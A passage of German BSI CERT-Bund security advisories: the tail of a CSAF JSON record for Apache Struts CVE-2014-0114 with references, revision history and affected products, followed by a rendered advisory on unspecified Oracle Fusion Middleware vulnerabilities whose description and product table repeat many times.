"text": "mittel"
},
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "de-DE",
"notes": [
{
"category": "legal_disclaimer",
"text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
},
{
"category": "description",
"text": "Struts ist ein Framework f\u00fcr Java-Anwendungen auf dem Webserver Apache.",
"title": "Produktbeschreibung"
},
{
"category": "summary",
"text": "Ein entfernter, anonymer Angreifer kann eine Schwachstelle in Apache Struts ausnutzen, um beliebigen Programmcode mit den Rechten des Dienstes auszuf\u00fchren.",
"title": "Angriff"
},
{
"category": "general",
"text": "- Linux\n- UNIX\n- Windows",
"title": "Betroffene Betriebssysteme"
}
],
"publisher": {
"category": "other",
"contact_details": "csaf-provider@cert-bund.de",
"name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
"namespace": "https://www.bsi.bund.de"
},
"references": [
{
"category": "self",
"summary": "WID-SEC-W-2023-0918 - CSAF Version",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2014/wid-sec-w-2023-0918.json"
},
{
"category": "self",
"summary": "WID-SEC-2023-0918 - Portal Version",
"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2023-0918"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2014:0474-1 vom 2014-05-07",
"url": "https://rhn.redhat.com/errata/RHSA-2014-0474.html"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2014:0497-1 vom 2014-05-14",
"url": "https://rhn.redhat.com/errata/RHSA-2014-0497.html"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2014:0498-1 vom 2014-05-14",
"url": "https://rhn.redhat.com/errata/RHSA-2014-0498.html"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2014:0500-1 vom 2014-05-14",
"url": "https://rhn.redhat.com/errata/RHSA-2014-0500.html"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2014:0511-1 vom 2014-05-15",
"url": "https://rhn.redhat.com/errata/RHSA-2014-0511.html"
},
{
"category": "external",
"summary": "SUSE Security Update: Security Update f\u00fcr Struts",
"url": "http://lists.opensuse.org/opensuse-security-announce/2014-07/msg00008.html"
},
{
"category": "external",
"summary": "Debian Security Advisory DSA-2940-1 vom 2014-08-21",
"url": "https://www.debian.org/security/2014/dsa-2940"
},
{
"category": "external",
"summary": "Oracle Critical Patch Update Advisory Appendix Retail Applications vom 2014-10-14",
"url": "http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html#AppendixRAPP"
},
{
"category": "external",
"summary": "HP Security Bulletin c04473828 vom 2014-10-14",
"url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04473828"
},
{
"category": "external",
"summary": "HP Security Bulletin HPSBGN03669 vom 2016-11-07",
"url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05324755"
},
{
"category": "external",
"summary": "NetApp Advisory Number NTAP-20140911-0001 vom 2017-04-06",
"url": "https://kb.netapp.com/support/s/article/ka51A00000007QFQAY/apache-struts-class-suppression-vulnerability-in-select-netapp-products?language=en_US"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2019:2995 vom 2019-10-10",
"url": "https://access.redhat.com/errata/RHSA-2019:2995"
},
{
"category": "external",
"summary": "Oracle Linux Security Advisory ELSA-2020-0194 vom 2020-04-24",
"url": "https://oss.oracle.com/pipermail/el-errata/2020-January/009538.html"
},
{
"category": "external",
"summary": "IBM Security Bulletin 6982881 vom 2023-04-12",
"url": "https://www.ibm.com/support/pages/node/6982881"
},
{
"category": "external",
"summary": "IBM Security Bulletin 7153639 vom 2024-05-17",
"url": "https://www.ibm.com/support/pages/node/7153639"
},
{
"category": "external",
"summary": "Oracle Linux Security Advisory ELSA-2025-10814 vom 2025-07-30",
"url": "https://linux.oracle.com/errata/ELSA-2025-10814.html"
}
],
"source_lang": "en-US",
"title": "Apache Struts: Schwachstelle erm\u00f6glicht Ausf\u00fchren von beliebigem Programmcode mit den Rechten des Dienstes",
"tracking": {
"current_release_date": "2025-07-30T22:00:00.000+00:00",
"generator": {
"date": "2025-07-31T07:59:33.145+00:00",
"engine": {
"name": "BSI-WID",
"version": "1.4.0"
}
},
"id": "WID-SEC-W-2023-0918",
"initial_release_date": "2014-05-06T22:00:00.000+00:00",
"revision_history": [
{
"date": "2014-05-06T22:00:00.000+00:00",
"number": "1",
"summary": "Initial Release"
},
{
"date": "2014-05-06T22:00:00.000+00:00",
"number": "2",
"summary": "Version nicht vorhanden"
},
{
"date": "2014-05-06T22:00:00.000+00:00",
"number": "3",
"summary": "Version nicht vorhanden"
},
{
"date": "2014-05-06T22:00:00.000+00:00",
"number": "4",
"summary": "Version nicht vorhanden"
},
{
"date": "2014-05-15T22:00:00.000+00:00",
"number": "5",
"summary": "New remediations available"
},
{
"date": "2014-05-15T22:00:00.000+00:00",
"number": "6",
"summary": "Version nicht vorhanden"
},
{
"date": "2014-07-15T22:00:00.000+00:00",
"number": "7",
"summary": "New remediations available"
},
{
"date": "2014-07-15T22:00:00.000+00:00",
"number": "8",
"summary": "Version nicht vorhanden"
},
{
"date": "2014-08-21T22:00:00.000+00:00",
"number": "9",
"summary": "New remediations available"
},
{
"date": "2014-08-21T22:00:00.000+00:00",
"number": "10",
"summary": "Version nicht vorhanden"
},
{
"date": "2014-08-21T22:00:00.000+00:00",
"number": "11",
"summary": "Version nicht vorhanden"
},
{
"date": "2014-08-21T22:00:00.000+00:00",
"number": "12",
"summary": "Version nicht vorhanden"
},
{
"date": "2014-08-21T22:00:00.000+00:00",
"number": "13",
"summary": "Version nicht vorhanden"
},
{
"date": "2016-11-06T23:00:00.000+00:00",
"number": "14",
"summary": "New remediations available"
},
{
"date": "2016-11-06T23:00:00.000+00:00",
"number": "15",
"summary": "Version nicht vorhanden"
},
{
"date": "2017-04-06T22:00:00.000+00:00",
"number": "16",
"summary": "n"
},
{
"date": "2017-04-06T22:00:00.000+00:00",
"number": "17",
"summary": "Version nicht vorhanden"
},
{
"date": "2019-10-09T22:00:00.000+00:00",
"number": "18",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2020-04-23T22:00:00.000+00:00",
"number": "19",
"summary": "Neue Updates von Oracle Linux aufgenommen"
},
{
"date": "2023-04-11T22:00:00.000+00:00",
"number": "20",
"summary": "Neue Updates von IBM aufgenommen"
},
{
"date": "2024-05-16T22:00:00.000+00:00",
"number": "21",
"summary": "Neue Updates von IBM aufgenommen"
},
{
"date": "2025-07-30T22:00:00.000+00:00",
"number": "22",
"summary": "Neue Updates von Oracle Linux aufgenommen"
}
],
"status": "final",
"version": "22"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "1",
"product": {
"name": "Apache Struts 1",
"product_id": "T003109",
"product_identification_helper": {
"cpe": "cpe:/a:apache:struts:1"
}
}
}
],
"category": "product_name",
"name": "Struts"
}
],
"category": "vendor",
"name": "Apache"
},
{
"branches": [
{
"category": "product_name",
"name": "Debian Linux Wheezy (7.0)",
"product": {
"name": "Debian Linux Wheezy (7.0)",
"product_id": "T001572",
"product_identification_helper": {
"cpe": "cpe:/o:debian:debian_linux:7.0"
}
}
}
],
"category": "vendor",
"name": "Debian"
},
{
"branches": [
{
"category": "product_name",
"name": "HPE SiteScope",
"product": {
"name": "HPE SiteScope",
"product_id": "T008871",
"product_identification_helper": {
"cpe": "cpe:/a:hp:sitescope:-"
}
}
},
{
"category": "product_name",
"name": "HPE XP P9000 Command View Advanced Edition",
"product": {
"name": "HPE XP P9000 Command View Advanced Edition",
"product_id": "T004073",
"product_identification_helper": {
"cpe": "cpe:/a:hp:xp_p9000_command_view_advanced_edition:-"
}
}
}
],
"category": "vendor",
"name": "HPE"
},
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "8.1",
"product": {
"name": "IBM Operational Decision Manager 8.10",
"product_id": "T013722",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:operational_decision_manager:8.10"
}
}
},
{
"category": "product_version",
"name": "8.11",
"product": {
"name": "IBM Operational Decision Manager 8.11",
"product_id": "T022173",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:operational_decision_manager:8.11"
}
}
}
],
"category": "product_name",
"name": "Operational Decision Manager"
}
],
"category": "vendor",
"name": "IBM"
},
{
"branches": [
{
"category": "product_name",
"name": "NetApp OnCommand Unified Manager",
"product": {
"name": "NetApp OnCommand Unified Manager",
"product_id": "T009408",
"product_identification_helper": {
"cpe": "cpe:/a:netapp:oncommand_unified_manager:-"
}
}
}
],
"category": "vendor",
"name": "NetApp"
},
{
"branches": [
{
"category": "product_name",
"name": "Oracle Linux",
"product": {
"name": "Oracle Linux",
"product_id": "T004914",
"product_identification_helper": {
"cpe": "cpe:/o:oracle:linux:-"
}
}
},
{
"category": "product_name",
"name": "Oracle Primavera",
"product": {
"name": "Oracle Primavera",
"product_id": "T001021",
"product_identification_helper": {
"cpe": "cpe:/a:oracle:primavera_portfolio_management:7.0"
}
}
},
{
"branches": [
{
"category": "product_version",
"name": "10",
"product": {
"name": "Oracle Retail Allocation 10.0",
"product_id": "T003997",
"product_identification_helper": {
"cpe": "cpe:/a:oracle:retail_allocation:10.0"
}
}
},
{
"category": "product_version",
"name": "11",
"product": {
"name": "Oracle Retail Allocation 11.0",
"product_id": "T003998",
"product_identification_helper": {
"cpe": "cpe:/a:oracle:retail_allocation:11.0"
}
}
},
{
"category": "product_version",
"name": "12",
"product": {
"name": "Oracle Retail Allocation 12.0",
"product_id": "T003999",
"product_identification_helper": {
"cpe": "cpe:/a:oracle:retail_allocation:12.0"
}
}
},
{
"category": "product_version",
"name": "13",
"product": {
"name": "Oracle Retail Allocation 13.0",
"product_id": "T004000",
"product_identification_helper": {
"cpe": "cpe:/a:oracle:retail_allocation:13.0"
}
}
},
{
"category": "product_version",
"name": "13.1",
"product": {
"name": "Oracle Retail Allocation 13.1",
"product_id": "T004001",
"product_identification_helper": {
"cpe": "cpe:/a:oracle:retail_allocation:13.1"
}
}
},
{
"category": "product_version",
"name": "13.2",
"product": {
"name": "Oracle Retail Allocation 13.2",
"product_id": "T004012",
"product_identification_helper": {
"cpe": "cpe:/a:oracle:retail_allocation:13.2"
}
}
}
],
"category": "product_name",
"name": "Retail Allocation"
},
{
"branches": [
{
"category": "product_version",
"name": "13.3",
"product": {
"name": "Oracle Retail Clearance Optimization Engine 13.3",
"product_id": "T004002",
"product_identification_helper": {
"cpe": "cpe:/a:oracle:retail_clearance_optimization_engine:13.3"
}
}
},
{
"category": "product_version",
"name": "13.4",
"product": {
"name": "Oracle Retail Clearance Optimization Engine 13.4",
"product_id": "T004003",
"product_identification_helper": {
"cpe": "cpe:/a:oracle:retail_clearance_optimization_engine:13.4"
}
}
},
{
"category": "product_version",
"name": "14",
"product": {
"name": "Oracle Retail Clearance Optimization Engine 14.0",
"product_id": "T004004",
"product_identification_helper": {
"cpe": "cpe:/a:oracle:retail_clearance_optimization_engine:14.0"
}
}
}
],
"category": "product_name",
"name": "Retail Clearance Optimization Engine"
},
{
"branches": [
{
"category": "product_version",
"name": "11",
"product": {
"name": "Oracle Retail Invoice Matching 11.0",
"product_id": "T001981",
"product_identification_helper": {
"cpe": "cpe:/a:oracle:retail_invoice_matching:11.0"
}
}
},
{
"category": "product_version",
"name": "12",
"product": {
"name": "Oracle Retail Invoice Matching 12.0",
"product_id": "T001982",
"product_identification_helper": {
"cpe": "cpe:/a:oracle:retail_invoice_matching:12.0"
}
}
},
{
"category": "product_version",
"name": "12.0 IN",
"product": {
"name": "Oracle Retail Invoice Matching 12.0 IN",
"product_id": "T001983",
"product_identification_helper": {
"cpe": "cpe:/a:oracle:retail_invoice_matching:12.0in"
}
}
},
{
"category": "product_version",
"name": "12.1",
"product": {
"name": "Oracle Retail Invoice Matching 12.1",
"product_id": "T001984",
"product_identification_helper": {
"cpe": "cpe:/a:oracle:retail_invoice_matching:12.1"
}
}
},
{
"category": "product_version",
"name": "13",
"product": {
"name": "Oracle Retail Invoice Matching 13.0",
"product_id": "T001985",
"product_identification_helper": {
"cpe": "cpe:/a:oracle:retail_invoice_matching:13.0"
}
}
},
{
"category": "product_version",
"name": "13.2",
"product": {
"name": "Oracle Retail Invoice Matching 13.2",
"product_id": "T001987",
"product_identification_helper": {
"cpe": "cpe:/a:oracle:retail_invoice_matching:13.2"
}
}
},
{
"category": "product_version",
"name": "14",
"product": {
"name": "Oracle Retail Invoice Matching 14.0",
"product_id": "T004005",
"product_identification_helper": {
"cpe": "cpe:/a:oracle:retail_invoice_matching:14.0"
}
}
},
{
"category": "product_version",
"name": "13.1",
"product": {
"name": "Oracle Retail Markdown Optimization 13.1",
"product_id": "T004011",
"product_identification_helper": {
"cpe": "cpe:/a:oracle:retail_invoice_matching:13.1"
}
}
}
],
"category": "product_name",
"name": "Retail Invoice Matching"
},
{
"branches": [
{
"category": "product_version",
"name": "12",
"product": {
"name": "Oracle Retail Markdown Optimization 12.0",
"product_id": "T004006",
"product_identification_helper": {
"cpe": "cpe:/a:oracle:retail_markdown_optimization:12.0"
}
}
},
{
"category": "product_version",
"name": "13",
"product": {
"name": "Oracle Retail Markdown Optimization 13.0",
"product_id": "T004007",
"product_identification_helper": {
"cpe": "cpe:/a:oracle:retail_markdown_optimization:13.0"
}
}
},
{
"category": "product_version",
"name": "13.2",
"product": {
"name": "Oracle Retail Markdown Optimization 13.2",
"product_id": "T004009",
"product_identification_helper": {
"cpe": "cpe:/a:oracle:retail_markdown_optimization:13.2"
}
}
},
{
"category": "product_version",
"name": "13.4",
"product": {
"name": "Oracle Retail Markdown Optimization 13.4",
"product_id": "T004010",
"product_identification_helper": {
"cpe": "cpe:/a:oracle:retail_markdown_optimization:13.4"
}
}
}
],
"category": "product_name",
"name": "Retail Markdown Optimization"
}
],
"category": "vendor",
"name": "Oracle"
},
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "5",
"product": {
"name": "Red Hat Enterprise Linux 5",
"product_id": "74289",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:5::server"
}
}
}
],
"category": "product_name",
"name": "Enterprise Linux"
},
{
"branches": [
{
"category": "product_version",
"name": "5",
"product": {
"name": "Red Hat Enterprise Linux Desktop 5",
"product_id": "T002352",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux_desktop:5:client"
}
}
}
],
"category": "product_name",
"name": "Enterprise Linux Desktop"
},
{
"category": "product_name",
"name": "Red Hat JBoss Fuse",
"product": {
"name": "Red Hat JBoss Fuse",
"product_id": "T003086",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:jboss_fuse:-"
}
}
},
{
"category": "product_name",
"name": "Red Hat Network Satellite Server",
"product": {
"name": "Red Hat Network Satellite Server",
"product_id": "9603",
"product_identification_helper": {
"cpe": "cpe:/h:redhat:network_satelite_server:-"
}
}
}
],
"category": "vendor",
"name": "Red Hat"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux",
"product": {
"name": "SUSE Linux",
"product_id": "T002207",
"product_identification_helper": {
"cpe": "cpe:/o:suse:suse_linux:-"
}
}
}
],
"category": "vendor",
"name": "SUSE"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2014-0114",
"product_status": {
"known_affected": [
"T004011",
"T004012",
"T009408",
"T013722",
"T003109",
"T004914",
"T001987",
"T001985",
"T001984",
"T001983",
"T001982",
"T001981",
"T004073",
"T008871",
"T001021",
"T002352",
"T003086",
"T004010",
"T004000",
"T004001",
"T004002",
"T004003",
"T004004",
"T004005",
"T004006",
"T004007",
"T003997",
"74289",
"T003998",
"T004009",
"T003999",
"T002207",
"9603",
"T001572",
"T022173"
]
},
"release_date": "2014-05-06T22:00:00.000+00:00",
"title": "CVE-2014-0114"
}
]
}
WID-SEC-W-2024-1277
Vulnerability from csaf_certbund - Published: 2017-04-18 22:00 - Updated: 2024-11-11 23:00Summary
Oracle Fusion Middleware: Mehrere Schwachstellen
Severity
Kritisch
Notes
Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.
Produktbeschreibung: Oracle Fusion Middleware bündelt mehrere Produkte zur Erstellung, Betrieb und Management von intelligenten Business Anwendungen.
Angriff: Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in Oracle Fusion Middleware ausnutzen, um dadurch die Integrität, Vertraulichkeit und Verfügbarkeit zu gefährden.
Betroffene Betriebssysteme: - Linux
- UNIX
- Windows
In Oracle Fusion Middleware existieren mehrere nicht näher beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrität und Verfügbarkeit gefährden. Für die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle veröffentlicht keine weiteren Details zu diesen Schwachstellen (außer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadenshöhe ausschließlich auf Basis der CVSS Impact Matrix. Der Maximalwert für diese Produkte ist "High" für "Integrity", "Confidentiality" und "Availability" und bewirkt damit eine "hohe" Schadenshöhe.
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Oracle WebCenter Sites
Oracle
|
cpe:/a:oracle:webcenter_sites:-
|
— | |
|
Oracle Fusion Middleware
Oracle
|
cpe:/a:oracle:fusion_middleware:-
|
— |
In Oracle Fusion Middleware existieren mehrere nicht näher beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrität und Verfügbarkeit gefährden. Für die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle veröffentlicht keine weiteren Details zu diesen Schwachstellen (außer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadenshöhe ausschließlich auf Basis der CVSS Impact Matrix. Der Maximalwert für diese Produkte ist "High" für "Integrity", "Confidentiality" und "Availability" und bewirkt damit eine "hohe" Schadenshöhe.
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Oracle WebCenter Sites
Oracle
|
cpe:/a:oracle:webcenter_sites:-
|
— | |
|
Oracle Fusion Middleware
Oracle
|
cpe:/a:oracle:fusion_middleware:-
|
— |
In Oracle Fusion Middleware existieren mehrere nicht näher beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrität und Verfügbarkeit gefährden. Für die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle veröffentlicht keine weiteren Details zu diesen Schwachstellen (außer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadenshöhe ausschließlich auf Basis der CVSS Impact Matrix. Der Maximalwert für diese Produkte ist "High" für "Integrity", "Confidentiality" und "Availability" und bewirkt damit eine "hohe" Schadenshöhe.
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Oracle WebCenter Sites
Oracle
|
cpe:/a:oracle:webcenter_sites:-
|
— | |
|
Oracle Fusion Middleware
Oracle
|
cpe:/a:oracle:fusion_middleware:-
|
— |
In Oracle Fusion Middleware existieren mehrere nicht näher beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrität und Verfügbarkeit gefährden. Für die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle veröffentlicht keine weiteren Details zu diesen Schwachstellen (außer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadenshöhe ausschließlich auf Basis der CVSS Impact Matrix. Der Maximalwert für diese Produkte ist "High" für "Integrity", "Confidentiality" und "Availability" und bewirkt damit eine "hohe" Schadenshöhe.
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Oracle WebCenter Sites
Oracle
|
cpe:/a:oracle:webcenter_sites:-
|
— | |
|
Oracle Fusion Middleware
Oracle
|
cpe:/a:oracle:fusion_middleware:-
|
— |
In Oracle Fusion Middleware existieren mehrere nicht näher beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrität und Verfügbarkeit gefährden. Für die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle veröffentlicht keine weiteren Details zu diesen Schwachstellen (außer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadenshöhe ausschließlich auf Basis der CVSS Impact Matrix. Der Maximalwert für diese Produkte ist "High" für "Integrity", "Confidentiality" und "Availability" und bewirkt damit eine "hohe" Schadenshöhe.
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Oracle WebCenter Sites
Oracle
|
cpe:/a:oracle:webcenter_sites:-
|
— | |
|
Oracle Fusion Middleware
Oracle
|
cpe:/a:oracle:fusion_middleware:-
|
— |
In Oracle Fusion Middleware existieren mehrere nicht näher beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrität und Verfügbarkeit gefährden. Für die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle veröffentlicht keine weiteren Details zu diesen Schwachstellen (außer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadenshöhe ausschließlich auf Basis der CVSS Impact Matrix. Der Maximalwert für diese Produkte ist "High" für "Integrity", "Confidentiality" und "Availability" und bewirkt damit eine "hohe" Schadenshöhe.
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Oracle WebCenter Sites
Oracle
|
cpe:/a:oracle:webcenter_sites:-
|
— | |
|
Oracle Fusion Middleware
Oracle
|
cpe:/a:oracle:fusion_middleware:-
|
— |
In Oracle Fusion Middleware existieren mehrere nicht näher beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrität und Verfügbarkeit gefährden. Für die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle veröffentlicht keine weiteren Details zu diesen Schwachstellen (außer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadenshöhe ausschließlich auf Basis der CVSS Impact Matrix. Der Maximalwert für diese Produkte ist "High" für "Integrity", "Confidentiality" und "Availability" und bewirkt damit eine "hohe" Schadenshöhe.
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Oracle WebCenter Sites
Oracle
|
cpe:/a:oracle:webcenter_sites:-
|
— | |
|
Oracle Fusion Middleware
Oracle
|
cpe:/a:oracle:fusion_middleware:-
|
— |
In Oracle Fusion Middleware existieren mehrere nicht näher beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrität und Verfügbarkeit gefährden. Für die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle veröffentlicht keine weiteren Details zu diesen Schwachstellen (außer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadenshöhe ausschließlich auf Basis der CVSS Impact Matrix. Der Maximalwert für diese Produkte ist "High" für "Integrity", "Confidentiality" und "Availability" und bewirkt damit eine "hohe" Schadenshöhe.
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Oracle WebCenter Sites
Oracle
|
cpe:/a:oracle:webcenter_sites:-
|
— | |
|
Oracle Fusion Middleware
Oracle
|
cpe:/a:oracle:fusion_middleware:-
|
— |
In Oracle Fusion Middleware existieren mehrere nicht näher beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrität und Verfügbarkeit gefährden. Für die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle veröffentlicht keine weiteren Details zu diesen Schwachstellen (außer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadenshöhe ausschließlich auf Basis der CVSS Impact Matrix. Der Maximalwert für diese Produkte ist "High" für "Integrity", "Confidentiality" und "Availability" und bewirkt damit eine "hohe" Schadenshöhe.
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Oracle WebCenter Sites
Oracle
|
cpe:/a:oracle:webcenter_sites:-
|
— | |
|
Oracle Fusion Middleware
Oracle
|
cpe:/a:oracle:fusion_middleware:-
|
— |
In Oracle Fusion Middleware existieren mehrere nicht näher beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrität und Verfügbarkeit gefährden. Für die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle veröffentlicht keine weiteren Details zu diesen Schwachstellen (außer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadenshöhe ausschließlich auf Basis der CVSS Impact Matrix. Der Maximalwert für diese Produkte ist "High" für "Integrity", "Confidentiality" und "Availability" und bewirkt damit eine "hohe" Schadenshöhe.
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Oracle WebCenter Sites
Oracle
|
cpe:/a:oracle:webcenter_sites:-
|
— | |
|
Oracle Fusion Middleware
Oracle
|
cpe:/a:oracle:fusion_middleware:-
|
— |
In Oracle Fusion Middleware existieren mehrere nicht näher beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrität und Verfügbarkeit gefährden. Für die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle veröffentlicht keine weiteren Details zu diesen Schwachstellen (außer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadenshöhe ausschließlich auf Basis der CVSS Impact Matrix. Der Maximalwert für diese Produkte ist "High" für "Integrity", "Confidentiality" und "Availability" und bewirkt damit eine "hohe" Schadenshöhe.
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Oracle WebCenter Sites
Oracle
|
cpe:/a:oracle:webcenter_sites:-
|
— | |
|
Oracle Fusion Middleware
Oracle
|
cpe:/a:oracle:fusion_middleware:-
|
— |
In Oracle Fusion Middleware existieren mehrere nicht näher beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrität und Verfügbarkeit gefährden. Für die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle veröffentlicht keine weiteren Details zu diesen Schwachstellen (außer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadenshöhe ausschließlich auf Basis der CVSS Impact Matrix. Der Maximalwert für diese Produkte ist "High" für "Integrity", "Confidentiality" und "Availability" und bewirkt damit eine "hohe" Schadenshöhe.
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Oracle WebCenter Sites
Oracle
|
cpe:/a:oracle:webcenter_sites:-
|
— | |
|
Oracle Fusion Middleware
Oracle
|
cpe:/a:oracle:fusion_middleware:-
|
— |
In Oracle Fusion Middleware existieren mehrere nicht näher beschriebene Schwachstellen. Durch Ausnutzung dieser Schwachstellen kann ein Angreifer die Vertraulichkeit, Integrität und Verfügbarkeit gefährden. Für die Ausnutzung einiger dieser Schwachstellen ist keine Authentifizierung notwendig. Oracle veröffentlicht keine weiteren Details zu diesen Schwachstellen (außer der Information in der Risiko Matrix im Oracle Advisory zum Critical Patch Update, siehe Link unten in diesem Advisory). Aufgrund der knappen Informationslage erfolgt die Bewertung der Schadenshöhe ausschließlich auf Basis der CVSS Impact Matrix. Der Maximalwert für diese Produkte ist "High" für "Integrity", "Confidentiality" und "Availability" und bewirkt damit eine "hohe" Schadenshöhe.
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Oracle WebCenter Sites
Oracle
|
cpe:/a:oracle:webcenter_sites:-
|
— | |
|
Oracle Fusion Middleware
Oracle
|
cpe:/a:oracle:fusion_middleware:-
|
— |
